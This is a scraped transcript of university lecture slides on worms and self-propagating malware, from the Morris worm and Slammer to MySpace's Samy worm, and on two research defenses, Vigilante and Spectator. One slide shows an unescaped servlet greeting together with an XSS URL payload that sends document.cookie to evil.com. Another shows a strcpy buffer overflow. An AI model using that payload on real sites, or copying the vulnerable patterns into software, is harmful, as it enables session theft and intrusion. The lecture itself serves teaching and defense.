worms and self-propagating malwarecss.csail.mit.edu/6.858/2011/slides/lec11.pdf · worms: a working...
TRANSCRIPT
![Page 1: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/1.jpg)
WORMS AND
SELF-PROPAGATING MALWARE
Ben Livshits, Microsoft Research
![Page 2: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/2.jpg)
Overview of Today’s Lecture
Malware: taxonomy
History, evolution, and
progression of worms: an overview
Worm defenses:
Vigilante worm detection/prevention paper
JavaScript worms
Spectator: JavaScript
worm detection and prevention
2
![Page 3: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/3.jpg)
Malicious Code: Taxonomy
Viruses – replicating malicious code
Worms – self-replicating malicious code Native code worms JavaScript worms
Logic bombs or backdoors or
Easter eggs: programmed malfunction
Trojan Horses – malicious program that masquerades as legitimate Backdoors Password stealers
Downloaders – loads other
malicious code on a machine
Dialers – generate money for attackers by having users unknowingly dial premium rate numbers
![Page 4: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/4.jpg)
Malicious Code: Taxonomy
Code generator kits (e.g. Virus Creation Lab)
Spammer programs
Flooders
DDOS tools
BotNets
Key-loggers
Adware
Spyware
Phishing attacks
![Page 5: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/5.jpg)
Worms: A Working Definition
A worm is a program that can run by itself and can propagate a fully working version of itself to other machines
It is derived from the word tapeworm, a parasitic organism that lives inside a host and saps its resources to maintain itself
5
![Page 6: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/6.jpg)
The Morris Worm (1988) 6
Robert T. Morris Boston Museum of Science
![Page 7: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/7.jpg)
Morris Worm Account by Spafford (1989) 7
![Page 8: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/8.jpg)
IKEE.B (DUH) IPHONE BOTNET – 2009
Very soon after this incident, around the week of 8 November, a second iPhone malware outbreak began in Australia, using the very same SSH vulnerability. This time the malware did not just infect jailbroken iPhones, but would then convert the iPhone into a self-propagating worm, to infect other iPhones. This worm, referred to as iKee.A, was developed by an Australian hacker named Ashley Towns
The worm would install a wallpaper of the British 1980's pop star Rick Astley onto the victim's iPhone, and it succeeded in infecting an estimated 21,000 victims within about a week.
However, unlike the Dutch teenager who was sanctioned and who apologized, Mr. Towns received some notoriety, and was subsequently offered a job by a leading Australian Software company, Mogeneration
8
![Page 9: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/9.jpg)
Worms: A Brief History 9
Morris Worm (1988)
Melissa (1999)
ILOVEYOU (2000)
Code Red (2001)
Nimda (2001)
Blaster (2003)
SQL Slammer (2003)
Samy/MySpace (2005)
xanga.com (2005)
SpaceFlash/MySpace
Yamanner/Yahoo! Mail
QSpace/MySpace
adultspace.com
gaiaonline.com
u-dominion.com (2007)
Mo
rris
Wo
rm
Mel
issa
Co
de
red
/Nim
da
Bla
ster
/Sla
mm
er
Sam
y
Yam
ann
er
/Yah
oo
! M
ail
1998 1999 2001 2003 2005 2006 …
![Page 10: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/10.jpg)
Morris Worm (1988)
Damage: 6,000 computers in just a few hours
What: just copied itself; didn’t touch data
Exploited:
buffer overflow in fingerd (UNIX)
sendmail debug mode (exec arbitrary cmds)
dictionary of 432 frequently used passwords
![Page 11: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/11.jpg)
Melissa (1999)
What: just copied itself; did not touch data
When date=time, “Twenty-two points, plus triple word score, plus
fifty points for using all my letters. Game’s over. I’m outta here.”
Exploited:
MS Word Macros (VB)
MS Outlook Address Book (Fanout = 50) “Important message from <user name> …”
![Page 12: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/12.jpg)
Code Red (2001)
Runs on WinNT 4.0 or Windows 2000
Scans port 80 on up to 100 random IP addresses
Resides only in RAM; no files
Exploits buffer overflow in Microsoft IIS 4.0/5.0 (Virus appeared one month after advisory went out)
Two flavors: Code Red I: high traffic, web
defacements, DDOS on whitehouse.gov, crash systems
Code Red II: high traffic, backdoor install, crash systems
Three phases: propagation (1-19), flood (20-27), termination (28-31)
Other victims: Cisco 600 Routers, HP JetDirect Printers
![Page 13: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/13.jpg)
Nimda (2001)
Multiple methods of spreading (email, client-to-server, server-to-client, network sharing)
Server-to-client: IE auto-executes readme.eml (that is attached to all HTML files the server sends back to the client)
Client-to-server: “burrows”: scanning is local 75% of time
Email: readme.exe is auto executed upon viewing HTML email on IE 5.1 or earlier
![Page 14: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/14.jpg)
More on Slammer
When Jan 25 2003
How Exploit Buffer-overflow MS SQL/MS SQL Server
Desktop Engine known vulnerability,
publicized in July 2002
Scale At least 74,000 hosts
Feature Fast propagation speed
>55million scans per second
two orders of magnitude faster than Code Red worm
No harmful payload
Countermeasure Patch Firewall (port blocking)
14
![Page 15: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/15.jpg)
Case Study: Slammer
Buffer overflow vulnerability in Microsoft SQL Server (MS02-039).
Vulnerability of the following kind:
ProcessUDPPacket() {
char SmallBuffer[ 100 ];
UDPRecv( LargeBuff );
strcpy( SmallBuf, LargeBuf );
…
}
![Page 16: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/16.jpg)
Slammer Propagation Map 16
![Page 17: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/17.jpg)
Manuel Costa, Jon Crowcroft, Miguel Castro, Ant Rowstron, Lidong Zhou, Lintao
Zhang, Paul Barham
Vigilante: End-to-End Containment of Internet Worms*
*Based on slides by Marcus Peinado, Microsoft Research
http://research.microsoft.com/en-us/projects/vigilante/
![Page 18: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/18.jpg)
Defense Landscape
What happened as a result of CodeRed, Slammer, and Blaster?
Lots of work on techniques for avoiding attacks Many papers are written
between 2003 and 2006
Some of them are practical
A few are deployed
Some are in widespread use
Automatic techniques: Stack canaries, ASLR, NX, static analysis tools, pen-testing, fuzzing, software development standards
Developer awareness: check for buffer overflows etc.
User awareness: install patches ASAP; use AV, use firewalls
Response infrastructure: fast patch release, AV
18
![Page 19: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/19.jpg)
The Worm Threat
worms are a serious threat
worm propagation disrupts Internet traffic
attacker gains control of infected machines
worms spread too fast for human response Slammer scanned most of the Internet in 10 minutes
infected 90% of vulnerable hosts
Conclusion: worm containment must be automatic
![Page 20: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/20.jpg)
Automatic Worm Containment
previous solutions are network centric analyse network traffic
generate signature and drop matching traffic or
block hosts with abnormal network behaviour
no vulnerability information at network level false negatives: worm traffic appears normal
false positives: good traffic misclassified
false positives are a barrier to automation
![Page 21: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/21.jpg)
Vigilante’s End-to-end Architecture
host-based detection
instrument software to analyse infection attempts
cooperative detection without trust
detectors generate self-certifying alerts (SCAs)
detectors broadcast SCAs
hosts generate filters to block infection
can contain fast spreading worms with small number of detectors and without false positives
![Page 22: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/22.jpg)
22
Worm Containment
Internet
• Vigilante Detectors – Analyze execution of
application – Produce alerts (SCAs) based
on attack packets and vulnerable applications
– Broadcast SCAs over the Pastry P2P network
Detector
SCA SCA
SCA
SCA SCA
• Receive SCAs • Verify SCAs • Generate packet filters from
SCAs • Deploy packet filters
![Page 23: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/23.jpg)
Self-certifying Alerts
identify an application vulnerability describe how to exploit a vulnerability
contain a log of events
contain verification information
enable hosts to verify if they are vulnerable replay infection with modified events
verification has no false positives
enable cooperative worm containment without trust
![Page 24: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/24.jpg)
Detection
dynamic dataflow analysis
track the flow of data from input messages mark memory as dirty when data is received
track all data movement
trap the worm before it executes any instructions track control flow changes
trap execution of input data
trap loading of data into the program counter
![Page 25: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/25.jpg)
Time to Generate Filters
24
273
3402
1
10
100
1000
10000
Slammer Blaster CodeRedFilt
er
ge
ne
ratio
n t
ime
(m
s)
![Page 26: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/26.jpg)
Vigilante Summary
Vigilante can contain worms automatically
requires no prior knowledge of vulnerabilities
no false positives
low false negatives
works with today’s binaries
Tested on CodeRed, Nimda, and Slammer
![Page 27: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/27.jpg)
What is the enabling software vulnerability behind regular worms? JavaScript worms?
Question of the Day 27
![Page 28: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/28.jpg)
Ben Livshits and Weidong Cui Microsoft Research
Redmond, WA
http://research.microsoft.com/en-us/projects/spectator/usenixtech08.pdf
![Page 29: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/29.jpg)
Web application vulnerabilities are everywhere
Cross-site scripting (XSS)
Dominates the charts
“Buffer overruns of this decade”
Key enabler of JavaScript worms
29
![Page 30: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/30.jpg)
String username = req.getParameter(“username”); ServletResponseStream out = resp.getOutputStream(); out.println("<p>Hello, " + username + ".</p>");
http://victim.com?username= <script> location = “http://evil.com/stealcookie.cgi?cookie= “ + escape(document.cookie)</script>
30
![Page 31: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/31.jpg)
Initial infection:
Samy’s MySpace page
Injected JavaScript payload
exploits a XSS hole
Propagation step:
User views an infected page
Payload executes
▪ Adds Samy as friend
▪ Add payload to user’s page
31
![Page 32: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/32.jpg)
Samy took down MySpace (October 2005)
Site couldn’t cope: down for two days
Came down after 13 hours
Cleanup costs
Yamanner (Yahoo mail) worm (June 2006)
Sent malicious HTML mail to users in the current user’s address book
Affected 200,000 users, emails used for spamming
32
![Page 33: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/33.jpg)
Worm name Type of site Release date
Samy/MySpace Social networking Oct-05
xanga.com Social networking Dec-05
SpaceFlash/MySpace Social networking Jul-06
Yamanner/Yahoo! Mail Email service Jun-06
QSpace/MySpace Social networking Nov-06
adultspace.com Social networking Dec-06
gaiaonline.com Online gaming Jan-07
u-dominion.com Online gaming Jan-07
33
![Page 34: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/34.jpg)
Worms of the previous decade enabled by buffer overruns
JavaScript worms are enabled by cross-site scripting (XSS)
Fixing XSS holes is best, but some vulnerabilities remain
The month of MySpace bugs
Database of XSS vulnerabilities: xssed.com
34
![Page 35: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/35.jpg)
Existing solutions rely on signatures (SonicWall)
Obfuscated and polymorphic JavaScript worms
Extremely easy to write
Most real-life worms are encoded or obfuscated
▪ escape(code)
▪ unescape(escaped_code)
35
![Page 36: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/36.jpg)
36
<HTML> <SCRIPT> anything goes here </SCRIPT> </HTML>
Server
Client
![Page 37: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/37.jpg)
Spectator: first practical JavaScript worm solution
Scalable, small constant-time end-to-end latency overhead
Deployment models for large sites supporting load balancing
Evaluation of Spectator:
Large-scale simulation setup for evaluating scalability and precision
Applied Spectator to a real site during worm propagation
37
![Page 38: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/38.jpg)
38
![Page 39: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/39.jpg)
u1 uploads to his page u2 downloads page of u1
u2 uploads to his page
u3 downloads page of u2
u3 uploads to his page
…
u1
u2
u3
Propagation chain
payload
1. Preserve causality of uploads, store as a graph
2. Detect long propagation chains
3. Report them as potential worm outbreaks
![Page 40: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/40.jpg)
tag1 -> tag2
Serv
er-s
ide
app
licat
ion
Spectator proxy
U2 request request
Clie
nt-
sid
e tr
acki
ng
pag
e
pag
e 40
tag
tag
U1
header
![Page 41: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/41.jpg)
Tagging of uploaded input <div> <b onclick="javascript:alert(’...’)">...</b> </div>
Client-side request tracking Injected JavaScript and response headers
Propagates causality information through cookies on the client side
<div spectator_tag=56>
41
![Page 42: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/42.jpg)
Propagation graph G:
Records causality between tags (content uploads)
Records IP address (approximation of user) with each
Distance between n1 and n2: # unique IP addresses
Diameter: longest distance between any two nodes
Worm definition: Diameter(G) > threshold d
<t0, ip0> <t1, ip1> <t2, ip0>
<t3, ip0>
<t4, ip2>
<t5, ip0>
<t6, ip0>
<t7, ip0> <t8, ip0>
<t9, ip0>
42
![Page 43: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/43.jpg)
Precise algorithm Approximate algorithm
Upload insertion time O(2n) O(1) on average
Upload insertion space O(n) O(n)
Worm containment time O(n) O(n) 43
Determining diameter precisely is exponential
Scalability is crucial Thousands of users Millions of uploads
Use greedy approximation of the diameter instead
![Page 44: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/44.jpg)
44
![Page 45: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/45.jpg)
Large-scale simulation with OurSpace:
Mimics a social networking site like MySpace
Experimented with various patterns of site access
Looked at the scalability
Real-life case study (Siteframe):
Uses Siteframe, a third-party social networking app
Developed a JavaScript worm for it similar to real-life ones
45
![Page 46: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/46.jpg)
Testbed: OurSpace
Every user has their own page
At any point, a user can read or write to a page Write(U1, “hello”); Write(U1, Read(U2)); Write(U3, Read(U1));
Various access scenarios:
Scenario 1: Worm outbreak (random topology)
Scenario 2: A single long blog entry
Scenario 3: A power law model of worm propagation
46
![Page 47: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/47.jpg)
Tag addition overhead pretty much constant
47
![Page 48: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/48.jpg)
Approximate worm detection works well
48
![Page 49: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/49.jpg)
Real-life worm experimentation is difficult
Used Siteframe, open-source blogging system
Found an exploitable XSS
Developed a worm for it
Scripted user behavior
Spectator flags the worm
49
![Page 50: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/50.jpg)
First effective defense against JavaScript worms Fast and slow, mono- and polymorphic worms
Scales well with low overhead
Essence of the approach Perform distributed data tainting
Look for long propagation chains
Demonstrated scalability and effectiveness
Spectator: Detection and Containment of JavaScript Worms, Usenix Annual Technical Conference, June 2008
50
![Page 51: WORMS AND SELF-PROPAGATING MALWAREcss.csail.mit.edu/6.858/2011/slides/LEC11.pdf · Worms: A Working Definition A worm is a program that can run by itself and can propagate a fully](https://reader034.vdocuments.us/reader034/viewer/2022050515/5f9f8e77893a127e5a652b35/html5/thumbnails/51.jpg)
Summary Malware: taxonomy
History, evolution, and
progression of worms: an overview
Worm defenses:
Vigilante worm detection/prevention paper
JavaScript worms
Spectator:
JavaScript worm detection and prevention
51